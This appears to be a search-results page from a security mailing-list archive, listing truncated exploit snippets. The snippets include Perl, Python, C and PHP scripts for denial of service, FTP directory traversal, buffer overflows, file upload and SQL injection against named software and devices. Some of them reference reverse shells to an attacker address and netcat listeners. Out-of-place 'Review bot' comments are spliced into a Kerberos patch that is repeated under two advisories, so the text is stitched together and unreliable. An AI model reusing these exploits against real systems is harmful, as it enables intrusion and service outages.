sock

[HISPASEC] 2K7SEPT6 X-Diesel Unreal Commander v0.92 (build 573) multiple FTP-based vulnerabilities

== Proof of Concept - Remote FTP Directory Traversal ==
# python FTP
# by Gynvael Coldwind
import socket

TransferSock = 0

def sendDirList (sock):
  (DataSock, Address) = TransferSock.accept()

[HISPASEC] 2K7SEPT6 Total Commander 7.01 Remote FTP Client Directory Traversal

== Proof of Concept ==
# python localhost ftp server

import socket

TransferSock = 0

def sendDirList (sock):
  (DataSock, Address) = TransferSock.accept()

[HISPASEC] 2K7SEPT6 Magellan Explorer 3.32 build 2305 Remote FTP Client Directory Traversal

== Proof of Concept ==
# python localhost ftp server
# by Gynvael Coldwind

import socket

TransferSock = 0

def sendDirList (sock):
  (DataSock, Address) = TransferSock.accept()

The father of all bombs - another webdav fiasco

### svn (subversion) servers!! Svn might let the PROPFIND slip through
### without authentication. bwhahaaha :o)
### use at your own risk!
##################################################################

use IO::Socket;
use MIME::Base64;

sub usage {
        print "Apache mod_dav / svn Remote Denial of Service Exploit\n";
        print "by kcope in 2009\n";

MITKRB5-SA-2008-002: array overrun in RPC library used by kadmin (resend, corrected subject)

=== src/lib/rpc/svc.c
==================================================================
- --- src/lib/rpc/svc.c (revision 1666)
+++ src/lib/rpc/svc.c   (local)
@@ -109,15 +109,17 @@
        if (sock < FD_SETSIZE) {
                xports[sock] = xprt;
                FD_SET(sock, &svc_fdset);
+               if (sock > svc_maxfd)
+                       svc_maxfd = sock;
        }
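
Review bot: the `if (sock < FD_SETSIZE)` block has no else branch in the visible lines, so a transport whose descriptor is at or above FD_SETSIZE is silently left out of both `xports[]` and `svc_fdset`. Unless the part of the function not shown here handles that case, report the failure to the caller so the transport can be closed instead of lingering unserviced. Keeping the new `svc_maxfd` update inside the guard is right, since it must never exceed what `svc_fdset` can hold.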

MITKRB5-SA-2008-001: double-free, uninitialized data vulnerabilities in krb5kdc

=== src/lib/rpc/svc.c
==================================================================
- --- src/lib/rpc/svc.c (revision 1666)
+++ src/lib/rpc/svc.c   (local)
@@ -109,15 +109,17 @@
        if (sock < FD_SETSIZE) {
                xports[sock] = xprt;
                FD_SET(sock, &svc_fdset);
+               if (sock > svc_maxfd)
+                       svc_maxfd = sock;
        }
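
Review bot: the guard `sock < FD_SETSIZE` checks only the upper bound before `xports[sock] = xprt` and `FD_SET(sock, &svc_fdset)`; if `sock` is a signed int, a negative value passes the test and indexes before the start of the array. Consider `if (sock >= 0 && sock < FD_SETSIZE)`, or an unsigned comparison, so that both array writes and the `svc_maxfd` update are bounded on both sides.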

[CORELAN-10-004] TurboFTP Server 1.00.712 remote DoS

print "|                                       http://www.corelan.be:8800 |\n";
print "|                                                                  |\n";
print "|-------------------------------------------------[ EIP Hunters ]--|\n\n";
print "[+] DoS exploit for TurboFTP Server 1.00.712 \n";

use IO::Socket; 

if ($#ARGV ne 3) { 
print "\n  usage: $0 <targetip> <targetport> <user> <password>\n"; 
exit(0); 
} 

Wireshark DNP3 Dissector Infinite Loop Vulnerability

use strict;
use warnings;

use Getopt::Std;
use IO::Socket::INET;

$SIG{INT}  = \&abort;

my $host  = '192.168.4.52';
my $port  = 20000;

Re: Creating Backdoors in Cisco IOS using Tcl

A quick comment on the TclShell source code (v0.1) included in http://www.irmplc.com/content/pdfs/Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf

The echo procedure fails to close the client socket on EOF.  This will cause the readable fileevent to trigger repeatedly consuming CPU and never freeing the socket.  As the Tcl interpreter on Cisco devices has a relatively small number of sockets (255 total system wide if memory serves) repeated connections to the backdoor would exhaust all available (to Tcl) sockets on the device effectively DoS'ing other Tcl scripts and probes running.

I'd recommend rewriting the echo proc as:

proc echo {sock} {
    global var

    if {[catch {gets $sock line}] || 

Remote buffer overflow in httpdx

#include <stdio.h>
#include <stdlib.h>
#include <error.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>

LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD

# thus on linux this is very tricky to exploit.
# this is a proof of concept, don't try this on real boxes
# see lsapilib.c line 1240 (http://litespeedtech.com/packages/lsapi/php-litespeed-5.4.tgz)

use IO::Socket;

$|=1;

#freebsd reverse shell port 443
#setup a netcat on this port ^^

Livebox Router vulnerability to REMOTE BUFFER OVERFLOW DoS (FTPD)_

FULL FTP SERVER NAME:"ADI Convergence Galaxy FTP server v0.1".

POC: 

#include <sys/types.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 
#include <arpa/inet.h> 
#include <netdb.h> 
#include <stdio.h> 
#include <unistd.h> 

{PRL} Xerox Workcenter 4150 Remote Buffer Overflow

=============

#!/usr/bin/perl -w


use IO::Socket;
if (@ARGV < 1){
exit
}
$ip = $ARGV[0];
#open the socket

{PRL} Lexmark Multiple Laser Printer Remote Stack Overflow

#
# This PoC will completely DoS the printer and all its services. Use it
# at your own risk.
#

use IO::Socket;
if (@ARGV < 1){
exit
}
$ip = $ARGV[0];
#open the socket

Re: Two buffer-overflow in FSD V2.052 d9 and FSFDT V3.000 d9[EXPLOIT]

# FSFDT remote exploit by weak[at]fraglab.at
# spawns reverse shell to 10.0.0.100:4321
# tested against 'FSFDT Windows FSD Beta from FSD V3.000 draft 9' on win2k sp4

use IO::Socket;

if( $#ARGV < 1 )
{
        print "usage: perl ".$0." <ip> <port>";
        exit();

DM Filemanager (fckeditor) Remote Arbitrary File Upload Exploit

*/
 
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
 $sock = fsockopen($host, 80);
 while (!$sock)
 {

Remote Buffer Overflow Exploit (TFTP Daemon Version 1.9) by Socket_0x03

//Vulnerability: Remote Buffer Overflow Exploit
//Impact: Remote Denial of Service Attack
//Vulnerable Application: TFTP Daemon Version 1.9
//Tested on Windows XP Service Pack II
//
//Author: Socket_0x03
//Contact: Socket_0x03 (at) teraexe (dot) com
//Website: www.teraexe.com
//
//################################################


Remote Buffer Overflow Exploit (TFTP Daemon Version 1.9) by Socket_0x03

//Vulnerability: Remote Buffer Overflow Exploit
//Impact: Remote Denial of Service Attack
//Vulnerable Application: TFTP Daemon Version 1.9
//Tested on Windows XP Service Pack II
//
//Author: Socket_0x03
//Contact: Socket_0x03@teraexe.com
//Website: www.teraexe.com
//
//################################################


Nakid CMS (fckeditor) Remote Arbitrary File Upload Exploit

*/
 
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
 $sock = fsockopen($host, 80);
 while (!$sock)
 {

Novell eDirectory 8.8 SP5 Dhost Http Server DoS

$data = "?" x 500000;

for($i= 0; $i < 1000; $i++)
{
        $sock= new IO::Socket::INET( PeerAddr => "localhost",
        PeerPort => 8028,

        Proto => 'tcp',
        Type => SOCK_STREAM, 


Cherokee Web Server 0.5.4 Denial Of Service

"Accept-Language: en-US,en;q=0.9\r\n".
"Accept-Charset: iso-8859-1,*,utf-8\r\n".
"Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0\r\n\r\n";


use IO::Socket::INET;
if (! defined $ARGV[0])
{
print "+========================================================+\n";
print "+ Program [Cherokee Web Server 0.5.4 Denial Of Service] +\n";
print "+ Author [Usman Saeed] +\n";

WireShark MMS Remote Denial of Service vulnerability

Update to 0.99.6

PoC
================================
//main.cpp
#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32")

char *http = 

Home FTP Server 'SITE INDEX' Command Remote Denial of Service Vulnerability

Details:
If you could log on to the server successfully, take the following steps and the application will stop service:

1.sock.connect((hostname, 21))
2.sock.send("user %s\r\n" %username)
3.sock.send("pass %s\r\n" %passwd)
4.for i in range(1,20):
         sock.send("SITE INDEX "+ "a"*30*i +"\r\n")
5.sock.close()

Family Connections 1.8.2 Blind SQL Injection (Correct Version)

#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>

int socket_connect(char *server, int port) {

XM Easy Personal FTP Server 'APPE' and 'DELE' Command Remote Denial of Service Vulnerability

XM Easy Personal FTP Server 5.8.0
Earlier versions may also be affected

Overview:
XM Easy Personal FTP Server is an easy-to-use FTP server application. A denial of service vulnerability exists in XM Personal FTP Server when "APPE" is used in one socket connection while the "DELE" command is used in another.

Details:
If you could log on to the server successfully, take the following steps and the FTP server will stop responding:

first socket connection:

Family Connections <= 1.8.2 - Remote Shell Upload Exploit

#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>

int socket_connect(char *server, int port) {

GCALDaemon Remote DoS

--------------------------------------------
#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket;

my $host = shift || die "Usage: $0 host [port]\n";
my $port = shift || 9090;
my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, PeerProto => 'tcp')
or die "error: $!\n";

TYPSoft FTP Server 'APPE' and 'DELE' Commands Remote DoS Vulnerabilities

Earlier versions may also be affected

Overview:
TYPSoft FTP Server is an easy-to-use FTP server application. A denial of service vulnerability exists in TYPSoft FTP Server when "APPE" and "DELE" commands are used in the same socket connection.

Details:
If you could log on to the server successfully, take the following steps and the FTP server will crash, which would lead to a denial of service:

XM Easy Personal FTP Server 'LIST' Command Remote DoS Vulnerability

Severity:
High

Exploit example:
#!/usr/bin/python
import socket
import sys

def Usage():
    print ("Usage:  ./expl.py <serv_ip>      <Username> <password>\n")
    print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")

Linux NULL pointer dereference due to incorrect proto_ops initializations

Linux NULL pointer dereference due to incorrect proto_ops initializations
-------------------------------------------------------------------------

In the Linux kernel, each socket has an associated struct of operations
called proto_ops which contain pointers to functions implementing various
features, such as accept, bind, shutdown, and so on.

If an operation on a particular socket is unimplemented, they are expected
to point the associated function pointer to predefined stubs, for example if
the "accept" operation is undefined it would point to sock_no_accept(). However,

Copyright © 1995-2012 LinuxRocket.net. All rights reserved.
